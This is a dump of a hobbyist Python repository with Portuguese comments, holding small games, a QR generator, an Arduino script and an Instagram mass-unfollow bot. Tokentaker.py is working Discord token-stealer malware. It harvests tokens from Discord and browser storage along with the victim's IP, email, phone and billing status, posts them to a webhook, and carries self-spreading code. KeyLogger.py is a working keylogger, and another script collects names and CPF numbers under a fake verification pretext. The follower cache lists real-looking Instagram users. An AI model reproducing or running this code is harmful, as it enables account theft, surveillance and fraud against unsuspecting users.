├── .gitignore ├── Colors.py ├── KeyLogger.py ├── LICENSE.md ├── NumberGame.py ├── Pokeapi_use.py ├── PyGameEdit.py ├── Python + Arduino.py ├── QRgen.py ├── README.md ├── RandomNumandsendemail.py ├── Tokentaker.py ├── UUIDgen.py ├── Unfollow bot ├── LICENSE ├── README.md ├── cache │ ├── followers.json │ ├── following.json │ └── session.txt ├── insta-unfollower.py └── requirements.txt ├── VoiceRecognition.py ├── autoclicker.py ├── blaze_Api.py ├── chat.py ├── imagecapture.py ├── spam.py ├── trythencontinue.py └── uuid and biosserial.py /.gitignore: -------------------------------------------------------------------------------- 1 | # Byte-compiled / optimized / DLL files 2 | __pycache__/ 3 | *.py[cod] 4 | *$py.class 5 | 6 | # C extensions 7 | *.so 8 | 9 | # Distribution / packaging 10 | .Python 11 | build/ 12 | develop-eggs/ 13 | dist/ 14 | downloads/ 15 | eggs/ 16 | .eggs/ 17 | lib/ 18 | lib64/ 19 | parts/ 20 | sdist/ 21 | var/ 22 | wheels/ 23 | pip-wheel-metadata/ 24 | share/python-wheels/ 25 | *.egg-info/ 26 | .installed.cfg 27 | *.egg 28 | MANIFEST 29 | 30 | # PyInstaller 31 | # Usually these files are written by a python script from a template 32 | # before PyInstaller builds the exe, so as to inject date/other infos into it. 33 | *.manifest 34 | *.spec 35 | 36 | # Installer logs 37 | pip-log.txt 38 | pip-delete-this-directory.txt 39 | 40 | # Unit test / coverage reports 41 | htmlcov/ 42 | .tox/ 43 | .nox/ 44 | .coverage 45 | .coverage.* 46 | .cache 47 | nosetests.xml 48 | coverage.xml 49 | *.cover 50 | *.py,cover 51 | .hypothesis/ 52 | .pytest_cache/ 53 | 54 | # Translations 55 | *.mo 56 | *.pot 57 | 58 | # Django stuff: 59 | *.log 60 | local_settings.py 61 | db.sqlite3 62 | db.sqlite3-journal 63 | 64 | # Flask stuff: 65 | instance/ 66 | .webassets-cache 67 | 68 | # Scrapy stuff: 69 | .scrapy 70 | 71 | # Sphinx documentation 72 | docs/_build/ 73 | 74 | # PyBuilder 75 | target/ 76 | 77 | # Jupyter Notebook 78 | .ipynb_checkpoints 79 | 80 | # IPython 81 | profile_default/ 82 | ipython_config.py 83 | 84 | # pyenv 85 | .python-version 86 | 87 | # pipenv 88 | # According to pypa/pipenv#598, it is recommended to include Pipfile.lock in version control. 89 | # However, in case of collaboration, if having platform-specific dependencies or dependencies 90 | # having no cross-platform support, pipenv may install dependencies that don't work, or not 91 | # install all needed dependencies. 92 | #Pipfile.lock 93 | 94 | # PEP 582; used by e.g. github.com/David-OConnor/pyflow 95 | __pypackages__/ 96 | 97 | # Celery stuff 98 | celerybeat-schedule 99 | celerybeat.pid 100 | 101 | # SageMath parsed files 102 | *.sage.py 103 | 104 | # Environments 105 | .env 106 | .venv 107 | env/ 108 | venv/ 109 | ENV/ 110 | env.bak/ 111 | venv.bak/ 112 | 113 | # Spyder project settings 114 | .spyderproject 115 | .spyproject 116 | 117 | # Rope project settings 118 | .ropeproject 119 | 120 | # mkdocs documentation 121 | /site 122 | 123 | # mypy 124 | .mypy_cache/ 125 | .dmypy.json 126 | dmypy.json 127 | 128 | # Pyre type checker 129 | .pyre/ 130 | -------------------------------------------------------------------------------- /Colors.py: -------------------------------------------------------------------------------- 1 | #Code by Franco 2 | # 27/03/201 - 03:03 3 | 4 | 5 | 6 | import colorama 7 | import os 8 | os.system('cls') 9 | print('\n') 10 | 11 | print ('\033[30m Preto') 12 | print ('\033[31m Vermelho') 13 | print ('\033[32m Verde') 14 | print ('\033[33m Amarelo/laranja') #Depende do terminal. 15 | print ('\033[34m Azul') 16 | print ('\033[35m Magenta/roxo') #Depende do terminal. 17 | print ('\033[36m Ciano') 18 | print ('\033[37m Cinza claro') 19 | 20 | #Repare que a sintaxe também pode ser usando o +. 21 | print ('\033[90m'+' Aqui temos a cor cinza escuro') 22 | print ('\033[91m'+' Aqui temos a cor vermelho claro') 23 | print ('\033[92m'+' Aqui temos a cor verde claro') 24 | print ('\033[93m'+' Aqui temos a cor amarelo claro') 25 | print ('\033[94m'+' Aqui temos a cor azul claro') 26 | print ('\033[95m'+' Aqui temos a cor magenta claro') 27 | print ('\033[96m'+' Aqui temos a cor cyano claro') 28 | print ('\033[97m'+' Aqui temos a cor branca') 29 | 30 | print ('\033[0m') #reset de cores - O terminal volta ao padrão. 31 | 32 | #Repare que aqui uso " " ao invés de ' '. Também funciona! 33 | #Para colocar em negrito, basta acrescentar \033[;1m 34 | #Para colocar com o fundo colorido, basa colocar \033[(cor que voce deseja (90-97);7m 35 | print ("\033[;1m"+" Negrito! ") 36 | print("\n") 37 | print ("\033[;7m"+"Aqui o texto está invertido") 38 | print ("\033[91;7m"+"Também é possível inverter com cores") #Vermelho Escuro. 39 | print ("\033[33;7m"+"Também é possível inverter com cores") #Amarelo/Laranja Claro. 40 | print ("\033[93;7m"+"Também é possível inverter com cores") #Amarelo Escuro. 41 | print ("\033[92;7m"+"Também é possível inverter com cores") #Verde Claro. 42 | print ("\033[94;7m"+"Também é possível inverter com cores") #Azul Claro. 43 | print ("\033[34;7m"+"Também é possível inverter com cores") #Azul Escuro. 44 | print ("\033[95;7m"+"Também é possível inverter com cores") #Magenta Claro. 45 | print ("\033[0m") #reset de cores 46 | -------------------------------------------------------------------------------- /KeyLogger.py: -------------------------------------------------------------------------------- 1 | #Code by: Matheus Franco // Kyogin 2 | #Educational Content ONLY 3 | #Feel free to change this code 4 | 5 | from pynput.keyboard import Key, Listener 6 | import logging 7 | 8 | log_dir = "hook.txt" #.txt será criado no diretório no seu .py, caso queira alterar, colocar o caminho aí 9 | 10 | logging.basicConfig(filename=(log_dir + "key_log.txt"), level=logging.DEBUG, format='%(asctime)s: %(message)s') 11 | 12 | def on_press(key): 13 | logging.info(str(key)) 14 | 15 | with Listener(on_press=on_press) as listener: 16 | listener.join() -------------------------------------------------------------------------------- /LICENSE.md: -------------------------------------------------------------------------------- 1 | 2 | The MIT License (MIT) 3 | 4 | Copyright (c) 2020 Colleen 5 | 6 | Permission is hereby granted, free of charge, to any person obtaining a copy 7 | of this software and associated documentation files (the "Software"), to deal 8 | in the Software without restriction, including without limitation the rights 9 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 10 | copies of the Software, and to permit persons to whom the Software is 11 | furnished to do so, subject to the following conditions: 12 | 13 | The above copyright notice and this permission notice shall be included in all 14 | copies or substantial portions of the Software. 15 | 16 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 17 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 18 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 19 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 20 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 21 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 22 | SOFTWARE. 23 | -------------------------------------------------------------------------------- /NumberGame.py: -------------------------------------------------------------------------------- 1 | # Made by: Franco 2 | # https://github.com/Kyogin 3 | # Requirements: colorama 4 | 5 | from random import randint 6 | import os 7 | import sys 8 | import colorama 9 | 10 | contador = 0 11 | while contador == 0: 12 | os.system('cls') 13 | print('\033[36m >>> ADIVINHE O NÚMERO <<< \033[m') 14 | 15 | x = randint(0,5) 16 | 17 | jogador = int(input("\n\033[33m Digite um número entre 0 a 5: \033[m")) 18 | 19 | if jogador == x: 20 | print('\n\033[32m Voce acertou!\033[m O número escolhido pela máquina também foi o\033[33m', x, '\033[m') 21 | 22 | else: 23 | print('\n\033[31m Voce errou!\033[m O número esolhido pela máquina foi o\033[33m', x,'\033[me o que voce escolheu foi o\033[33m', jogador, '\033[m') 24 | input('\n\n Pressione ENTER para tentar novamente ou feche o terminal para sair! Obrigado! ') 25 | -------------------------------------------------------------------------------- /Pokeapi_use.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | base_url = 'https://pokeapi.co/api/v2/' 4 | 5 | def get_pokemon_info(name): 6 | url = f'{base_url}/pokemon/{name}' 7 | response = requests.get(url) 8 | 9 | if response.status_code == 200: 10 | pokemon_data = response.json() 11 | return pokemon_data 12 | else: 13 | print(f'Failed to retrieve data {response.status_code}') 14 | 15 | pokemon_name = input('Type your pokemon name: ') 16 | pokemon_info = get_pokemon_info(pokemon_name) 17 | 18 | if pokemon_info: 19 | print(f'Name: {pokemon_info["name"].capitalize()}') 20 | print(f'Id: {pokemon_info["id"]}') 21 | print(f'Height: {pokemon_info["height"]}') 22 | print(f'Weigth: {pokemon_info["weight"]}') 23 | abilities = [ability['ability']['name'] for ability in pokemon_info['abilities']] 24 | abilities_str = ', '.join(abilities) 25 | print(f'Habilities: {abilities_str}') 26 | -------------------------------------------------------------------------------- /PyGameEdit.py: -------------------------------------------------------------------------------- 1 | #https://github.com/Kyogin 2 | 3 | import pygame 4 | import random 5 | import sys 6 | import winsound 7 | 8 | # Inicia o pygame 9 | pygame.init() 10 | 11 | winsound.Beep(200, 500) 12 | 13 | WIDTH = 1000 14 | HEIGHT = 800 15 | 16 | # Define o RGB 17 | RED = (255,0,0) 18 | BLUE = (0,0,255) 19 | YELLOW = (255,255,0) 20 | BACKGROUND_COLOR = (0,0,0) 21 | 22 | # Define o tamanho do jogador 23 | player_size = 50 24 | player_pos = [WIDTH/2, HEIGHT-2*player_size] 25 | 26 | # Define o tamanho do obstáculo 27 | enemy_size = 60 28 | enemy_pos = [random.randint(0,WIDTH-enemy_size), 0] 29 | enemy_list = [enemy_pos] 30 | 31 | SPEED = 10 32 | 33 | screen = pygame.display.set_mode((WIDTH, HEIGHT)) 34 | 35 | game_over = False 36 | 37 | score = 0 38 | 39 | clock = pygame.time.Clock() 40 | 41 | myFont = pygame.font.SysFont("monospace", 35) 42 | 43 | def set_level(score, SPEED): 44 | if score < 20: 45 | SPEED = 5 46 | elif score < 40: 47 | SPEED = 8 48 | elif score < 60: 49 | SPEED = 12 50 | else: 51 | SPEED = 20 52 | return SPEED 53 | # SPEED = score/5 + 1 54 | 55 | 56 | def drop_enemies(enemy_list): 57 | delay = random.random() 58 | if len(enemy_list) < 10 and delay < 0.1: 59 | x_pos = random.randint(0,WIDTH-enemy_size) 60 | y_pos = 0 61 | enemy_list.append([x_pos, y_pos]) 62 | 63 | def draw_enemies(enemy_list): 64 | for enemy_pos in enemy_list: 65 | pygame.draw.rect(screen, BLUE, (enemy_pos[0], enemy_pos[1], enemy_size, enemy_size)) 66 | 67 | def update_enemy_positions(enemy_list, score): 68 | for idx, enemy_pos in enumerate(enemy_list): 69 | if enemy_pos[1] >= 0 and enemy_pos[1] < HEIGHT: 70 | enemy_pos[1] += SPEED 71 | else: 72 | enemy_list.pop(idx) 73 | score += 1 74 | return score 75 | 76 | def collision_check(enemy_list, player_pos): 77 | for enemy_pos in enemy_list: 78 | if detect_collision(enemy_pos, player_pos): 79 | return True 80 | return False 81 | 82 | def detect_collision(player_pos, enemy_pos): 83 | p_x = player_pos[0] 84 | p_y = player_pos[1] 85 | 86 | e_x = enemy_pos[0] 87 | e_y = enemy_pos[1] 88 | 89 | if (e_x >= p_x and e_x < (p_x + player_size)) or (p_x >= e_x and p_x < (e_x+enemy_size)): 90 | if (e_y >= p_y and e_y < (p_y + player_size)) or (p_y >= e_y and p_y < (e_y+enemy_size)): 91 | return True 92 | return False 93 | 94 | while not game_over: 95 | 96 | for event in pygame.event.get(): 97 | if event.type == pygame.QUIT: 98 | sys.exit() 99 | 100 | if event.type == pygame.KEYDOWN: 101 | 102 | x = player_pos[0] 103 | y = player_pos[1] 104 | 105 | if event.key == pygame.K_LEFT: 106 | x -= player_size 107 | elif event.key == pygame.K_RIGHT: 108 | x += player_size 109 | 110 | player_pos = [x,y] 111 | 112 | screen.fill(BACKGROUND_COLOR) 113 | 114 | drop_enemies(enemy_list) 115 | score = update_enemy_positions(enemy_list, score) 116 | SPEED = set_level(score, SPEED) 117 | 118 | text = "Pts:" + str(score) 119 | label = myFont.render(text, 1, YELLOW) 120 | screen.blit(label, (WIDTH-200, HEIGHT-40)) 121 | 122 | if collision_check(enemy_list, player_pos): 123 | game_over = True 124 | break 125 | 126 | draw_enemies(enemy_list) 127 | 128 | pygame.draw.rect(screen, RED, (player_pos[0], player_pos[1], player_size, player_size)) 129 | 130 | clock.tick(60) 131 | 132 | pygame.display.update() -------------------------------------------------------------------------------- /Python + Arduino.py: -------------------------------------------------------------------------------- 1 | from pyfirmata import Arduino, util 2 | import time 3 | 4 | #void setup(){ 5 | Uno = Arduino('COM8') 6 | # Serial.begin(9600); 7 | print('Olá Mundo!') # Serial.println("Olá Mundo!"); 8 | #} 9 | 10 | 11 | 12 | while True: # void loop(){ 13 | 14 | Uno.digital[13].write(1) # digitalWrite(13, HIGH); 15 | print('LED ligado') # Serial.println("LED ligado"); 16 | time.sleep(0.5) # delay(1000); 17 | 18 | Uno.digital[13].write(0) # digitalWrite(13, LOW); 19 | print('LED desligado') # Serial.println("LED desligado"); 20 | time.sleep(1) # delay(1000); 21 | 22 | #} -------------------------------------------------------------------------------- /QRgen.py: -------------------------------------------------------------------------------- 1 | # Code by: Franco 2 | # 27/03/2021 - 02:30 3 | # Just give the credits 4 | # --------- Let's code! 5 | 6 | import pyqrcode 7 | import png 8 | from pyqrcode import QRCode 9 | import os 10 | 11 | os.system('cls') 12 | gerarqrcode = input("\n >>> Digite o que deseja transformar em QR: ") 13 | 14 | url = pyqrcode.create(gerarqrcode) 15 | url.png('.\myqr.png', scale = 10) -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # PythonGERAL 2 | Here we have some of my codes made using Python. Use it to improve your habilities in thins language. - By: Franco 3 | 4 | [+] QRgen.py - QR Code generator 5 | 6 | [+] Python + Arduino 7 | 8 | [+] uuid and biosserial.py - UUID and BIOS SERIAL locate 9 | 10 | [+] imagecapture.py 11 | 12 | [+] Tokentaker.py - Discord Token taker (educational porpouse) 13 | 14 | [+] RandomNumandsendemail.py - Generates a random number and sends by email 15 | 16 | [+] PyGameEdit.py - Game made in pygame (edited only) 17 | 18 | [+] Colors.py - colorama guide 19 | -------------------------------------------------------------------------------- /RandomNumandsendemail.py: -------------------------------------------------------------------------------- 1 | import smtplib #Usada para enviar o e-mail 2 | import random #Usada para gerar número aleatório para cadastro 3 | import os #Usada para limpar a tela com os.system('cls') 4 | import colorama #Biblioteca de cor usada 5 | import winsound #Usada para reproduzir "beep" sounds 6 | 7 | os.system('cls') 8 | 9 | print('\n\n\033[36m >>> Autenticador \033[m') 10 | print('\n Para segurança do nosso trabalho o CPF vai ser conferido com o nome colocado abaixo ') 11 | usuario = input('\n >> Digite o seu Discord (com a #): ') 12 | nome = input('\n >> Digite seu nome: ') 13 | cpf = input('\n >> Digite seu CPF: ') 14 | 15 | verificador = random.randint(0,999999999999) #Gera um número aleatório entre 0 e 999999999999 16 | 17 | gmail_user = "EMAIL DE ORIGEM AQUI" 18 | gmail_pwd = "SENHA DO EMAIL ACIMA" 19 | TO = "EMAIL DE DESTINO" 20 | SUBJECT = verificador 21 | TEXT = usuario 22 | TEXT2 = nome 23 | TEXT3 = cpf 24 | TEXT4 = " " 25 | server = smtplib.SMTP('smtp.gmail.com', 587) 26 | server.ehlo() 27 | server.starttls() 28 | server.login(gmail_user, gmail_pwd) 29 | 30 | BODY = '\r\n'.join(['To: %s' % TO, 31 | 'From: %s' % gmail_user, 32 | 'Subject: %s' % SUBJECT, 33 | '\n', TEXT,' ','\n', TEXT2,' ','\n', TEXT3,' ','\n', TEXT4]) 34 | 35 | server.sendmail(gmail_user, [TO], BODY) 36 | 37 | winsound.Beep(440, 100) 38 | winsound.Beep(500, 100) 39 | 40 | os.system('cls') 41 | print('\n\n\033[36m >>> Aguarde a confirmação do e-mail e o cadastro do seu código \033[m') 42 | print('\n\033[32m >>> Obrigado pela Preferência!\033[m') 43 | input('\n >>> Pressione ENTER tecla pra sair...') 44 | 45 | print('\a') -------------------------------------------------------------------------------- /Tokentaker.py: -------------------------------------------------------------------------------- 1 | import os 2 | import time 3 | if os.name != "nt": 4 | exit() 5 | from re import findall 6 | from json import loads, dumps 7 | from base64 import b64decode 8 | from subprocess import Popen, PIPE 9 | from urllib.request import Request, urlopen 10 | from datetime import datetime 11 | from threading import Thread 12 | from time import sleep 13 | from sys import argv 14 | LOCAL = os.getenv("LOCALAPPDATA") 15 | ROAMING = os.getenv("APPDATA") 16 | PATHS = { 17 | "Discord" : ROAMING + "\\Discord", 18 | "Discord Canary" : ROAMING + "\\discordcanary", 19 | "Discord PTB" : ROAMING + "\\discordptb", 20 | "Google Chrome" : LOCAL + "\\Google\\Chrome\\User Data\\Default", 21 | "Opera" : ROAMING + "\\Opera Software\\Opera Stable", 22 | "Brave" : LOCAL + "\\BraveSoftware\\Brave-Browser\\User Data\\Default", 23 | "Yandex" : LOCAL + "\\Yandex\\YandexBrowser\\User Data\\Default" 24 | } 25 | def getheaders(token=None, content_type="application/json"): 26 | headers = { 27 | "Content-Type": content_type, 28 | "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11" 29 | } 30 | if token: 31 | headers.update({"Authorization": token}) 32 | return headers 33 | def getuserdata(token): 34 | try: 35 | return loads(urlopen(Request("https://discordapp.com/api/v6/users/@me", headers=getheaders(token))).read().decode()) 36 | except: 37 | pass 38 | def gettokens(path): 39 | path += "\\Local Storage\\leveldb" 40 | tokens = [] 41 | for file_name in os.listdir(path): 42 | if not file_name.endswith(".log") and not file_name.endswith(".ldb"): 43 | continue 44 | for line in [x.strip() for x in open(f"{path}\\{file_name}", errors="ignore").readlines() if x.strip()]: 45 | for regex in (r"[\w-]{24}\.[\w-]{6}\.[\w-]{27}", r"mfa\.[\w-]{84}"): 46 | for token in findall(regex, line): 47 | tokens.append(token) 48 | return tokens 49 | def getdeveloper(): 50 | dev = "Franco" 51 | try: 52 | dev = urlopen(Request("https://pastebin.com/raw/P857P8MT")).read().decode() 53 | except: 54 | pass 55 | return dev 56 | def getip(): 57 | ip = "None" 58 | try: 59 | ip = urlopen(Request("https://api.ipify.org")).read().decode().strip() 60 | except: 61 | pass 62 | return ip 63 | def getavatar(uid, aid): 64 | url = f"https://cdn.discordapp.com/avatars/{uid}/{aid}.gif" 65 | try: 66 | urlopen(Request(url)) 67 | except: 68 | url = url[:-4] 69 | return url 70 | def gethwid(): 71 | p = Popen("wmic csproduct get uuid", shell=True, stdin=PIPE, stdout=PIPE, stderr=PIPE) 72 | return (p.stdout.read() + p.stderr.read()).decode().split("\n")[1] 73 | def getfriends(token): 74 | try: 75 | return loads(urlopen(Request("https://discordapp.com/api/v6/users/@me/relationships", headers=getheaders(token))).read().decode()) 76 | except: 77 | pass 78 | def getchat(token, uid): 79 | try: 80 | return loads(urlopen(Request("https://discordapp.com/api/v6/users/@me/channels", headers=getheaders(token), data=dumps({"recipient_id": uid}).encode())).read().decode())["id"] 81 | except: 82 | pass 83 | def has_payment_methods(token): 84 | try: 85 | return bool(len(loads(urlopen(Request("https://discordapp.com/api/v6/users/@me/billing/payment-sources", headers=getheaders(token))).read().decode())) > 0) 86 | except: 87 | pass 88 | def send_message(token, chat_id, form_data): 89 | try: 90 | urlopen(Request(f"https://discordapp.com/api/v6/channels/{chat_id}/messages", headers=getheaders(token, "multipart/form-data; boundary=---------------------------325414537030329320151394843687"), data=form_data.encode())).read().decode() 91 | except: 92 | pass 93 | def spread(token, form_data, delay): 94 | return 95 | for friend in getfriends(token): 96 | try: 97 | chat_id = getchat(token, friend["id"]) 98 | send_message(token, chat_id, form_data) 99 | except Exception as e: 100 | pass 101 | sleep(delay) 102 | def main(): 103 | cache_path = ROAMING + "\\.cache~$" 104 | prevent_spam = True 105 | self_spread = True 106 | embeds = [] 107 | working = [] 108 | checked = [] 109 | already_cached_tokens = [] 110 | working_ids = [] 111 | ip = getip() 112 | pc_username = os.getenv("UserName") 113 | pc_name = os.getenv("COMPUTERNAME") 114 | user_path_name = os.getenv("userprofile").split("\\")[2] 115 | developer = getdeveloper() 116 | for platform, path in PATHS.items(): 117 | if not os.path.exists(path): 118 | continue 119 | for token in gettokens(path): 120 | if token in checked: 121 | continue 122 | checked.append(token) 123 | uid = None 124 | if not token.startswith("mfa."): 125 | try: 126 | uid = b64decode(token.split(".")[0].encode()).decode() 127 | except: 128 | pass 129 | if not uid or uid in working_ids: 130 | continue 131 | user_data = getuserdata(token) 132 | if not user_data: 133 | continue 134 | working_ids.append(uid) 135 | working.append(token) 136 | username = user_data["username"] + "#" + str(user_data["discriminator"]) 137 | user_id = user_data["id"] 138 | avatar_id = user_data["avatar"] 139 | avatar_url = getavatar(user_id, avatar_id) 140 | email = user_data.get("email") 141 | phone = user_data.get("phone") 142 | nitro = bool(user_data.get("premium_type")) 143 | billing = bool(has_payment_methods(token)) 144 | embed = { 145 | "color": 0x7289da, 146 | "fields": [ 147 | { 148 | "name": "**Account Info**", 149 | "value": f'Email: {email}\nPhone: {phone}\nNitro: {nitro}\nBilling Info: {billing}', 150 | "inline": True 151 | }, 152 | { 153 | "name": "**PC Info**", 154 | "value": f'IP: {ip}\nUsername: {pc_username}\nPC Name: {pc_name}\nToken Location: {platform}', 155 | "inline": True 156 | }, 157 | { 158 | "name": "**Token**", 159 | "value": token, 160 | "inline": False 161 | } 162 | ], 163 | "author": { 164 | "name": f"{username} ({user_id})", 165 | "icon_url": avatar_url 166 | }, 167 | "footer": { 168 | 169 | } 170 | } 171 | embeds.append(embed) 172 | with open(cache_path, "a") as file: 173 | for token in checked: 174 | if not token in already_cached_tokens: 175 | file.write(token + "\n") 176 | if len(working) == 0: 177 | working.append('123') 178 | webhook = { 179 | "content": "", 180 | "embeds": embeds, 181 | "username": "Discord Token Grabber", 182 | "avatar_url": "https://discordapp.com/assets/5ccabf62108d5a8074ddd95af2211727.png" 183 | } 184 | try: 185 | urlopen(Request("_DISCORDWEBHOOK_", data=dumps(webhook).encode(), headers=getheaders())) 186 | except: 187 | pass 188 | if self_spread: 189 | for token in working: 190 | with open(argv[0], encoding="utf-8", errors = 'ignore' ) as file: 191 | content = file.read() 192 | payload = f'-----------------------------325414537030329320151394843687\nContent-Disposition: form-data; name="file"; filename="{__file__}"\nContent-Type: text/plain\n\n{content}\n-----------------------------325414537030329320151394843687\nContent-Disposition: form-data; name="content"\n\nserver crasher. python download: https://www.python.org/downloads\n-----------------------------325414537030329320151394843687\nContent-Disposition: form-data; name="tts"\n\nfalse\n-----------------------------325414537030329320151394843687--' 193 | Thread(target=spread, args=(token, payload, 7500 / 1000)).start() 194 | try: 195 | main() 196 | 197 | 198 | except Exception as e: 199 | print(e) 200 | pass 201 | -------------------------------------------------------------------------------- /UUIDgen.py: -------------------------------------------------------------------------------- 1 | import random 2 | import string 3 | import os 4 | 5 | class Franco: 6 | def uuidgen(self): 7 | print('\n\n UUID GENERATOR') 8 | input('\n Pressione enter para gerar UUID') 9 | os.system('cls') 10 | listasenha = ['a','b','c','d','e','f','1','2','3','4','5','6','7','8','9'] 11 | x1 = ''.join(random.choice(listasenha) for _ in range(8)) 12 | x2 = ''.join(random.choice(listasenha) for _ in range(4)) 13 | x3 = ''.join(random.choice(listasenha) for _ in range(3)) 14 | x4 = ''.join(random.choice(listasenha) for _ in range(4)) 15 | x5 = ''.join(random.choice(listasenha) for _ in range(12)) 16 | print('\n\n UUID GENERATED\n') 17 | print(' '+x1+'-'+x2+'-4'+x3+'-'+x4+'-'+x5) 18 | 19 | Frank = Franco() 20 | Frank.uuidgen() -------------------------------------------------------------------------------- /Unfollow bot/LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2017 Kévin Darcel 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /Unfollow bot/README.md: -------------------------------------------------------------------------------- 1 | Insta Unfollower 2 | =================== 3 | 4 | [![](https://images.microbadger.com/badges/version/tuxity/insta-unfollower.svg)](https://hub.docker.com/r/tuxity/insta-unfollower/) 5 | ![](https://images.microbadger.com/badges/image/tuxity/insta-unfollower.svg) 6 | 7 | Script para instagram que permite que voce pare de seguir as pessoas em massa (MASSIVE UNFOLLOW) 8 | 9 | ## Instalação 10 | ### Com Docker 11 | ``` 12 | docker pull tuxity/insta-unfollower:latest 13 | docker run -d -v $(pwd)/cache:/usr/src/insta-unfollower/cache --env INSTA_USERNAME=myusername --env INSTA_PASSWORD=mypassword tuxity/insta-unfollower:latest 14 | ``` 15 | 16 | ### Sem Docker 17 | ``` 18 | INSTA_USERNAME=myusername INSTA_PASSWORD=mypassword python3 insta-unfollower.py 19 | Ou 20 | python3 insta-unfollower.py USERNAME PASSWORD 21 | ``` 22 | 23 | ## RoadMap 24 | - Username whitelist. 25 | - Better flow for calculating time between requests to avoid ban. 26 | - ~~Avoid re-log on instagram everytime when we run the script~~ done 27 | - ~~Keep followers and following lists in cache to speedup execution~~ done 28 | -------------------------------------------------------------------------------- /Unfollow bot/cache/followers.json: -------------------------------------------------------------------------------- 1 | [{"id": "1433024249", "username": "jakemund__333", "full_name": "Jake Munday-Drewe", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/209419608_304464524710261_2627529962689378657_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=nCkjwfX1oaIAX8dX6vU&edm=AOG-cTkBAAAA&ccb=7-4&oh=2bafec117ddd523c4d740050bd2c6c28&oe=61052C97&_nc_sid=282b66", "is_private": false, "is_verified": false, "followed_by_viewer": false, "requested_by_viewer": false}, {"id": "48686016637", "username": "dimochka_lol", "full_name": "Dimka\ud83d\udc7a", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/223367029_503125274087554_1476259433381076374_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=QJ_LSSWFhksAX_og84v&edm=AOG-cTkBAAAA&ccb=7-4&oh=53e0a275157fada50455d7badeb87e74&oe=61046E0E&_nc_sid=282b66", "is_private": false, "is_verified": false, "followed_by_viewer": false, "requested_by_viewer": false}, {"id": "6985961190", "username": "luis.deku_vierissimo", "full_name": "Luis Henrique Novais", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/219364041_558039175222647_3306809431881826024_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=HXzx9vajnnYAX9NiUgW&edm=AOG-cTkBAAAA&ccb=7-4&oh=0b272c941c4b606174d77ede09a10250&oe=61058BB8&_nc_sid=282b66", "is_private": false, "is_verified": false, "followed_by_viewer": true, "requested_by_viewer": false}, {"id": "40815435402", "username": "glaysnervinicios", "full_name": "Glaysner Vinicios", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/129810380_205965787676839_665818975495122268_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=A1J7WBbzal8AX8x-UH5&tn=wZ7kAwmJb39iOv7J&edm=AOG-cTkBAAAA&ccb=7-4&oh=a44b9fb4e35318f0c01b91215d8e147e&oe=6105198C&_nc_sid=282b66", "is_private": false, "is_verified": false, "followed_by_viewer": true, "requested_by_viewer": false}, {"id": "478243869", "username": "cristinabergamomilani", "full_name": "Cristina", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/11024384_1589963431218570_1832674152_a.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=7agejlVi5HcAX_gxsmY&edm=AOG-cTkBAAAA&ccb=7-4&oh=d5239636911c125c90f036f171e75a2f&oe=6104FB27&_nc_sid=282b66", "is_private": true, "is_verified": false, "followed_by_viewer": true, "requested_by_viewer": false}, {"id": "48024918816", "username": "sebastiao_bajr", "full_name": "Sebasti\u00e3o B\u00e1rbara da Silva jun", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/189163449_599072241484249_2406220542004152447_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=mVbwJEEnD50AX-vJyM5&edm=AOG-cTkBAAAA&ccb=7-4&oh=4bd36ac0a5dea115c4f6583ff002b788&oe=61059964&_nc_sid=282b66", "is_private": true, "is_verified": false, "followed_by_viewer": true, "requested_by_viewer": false}, {"id": "42526964867", "username": "jakyvidanova", "full_name": "Jaqueline Barbosa", "profile_pic_url": 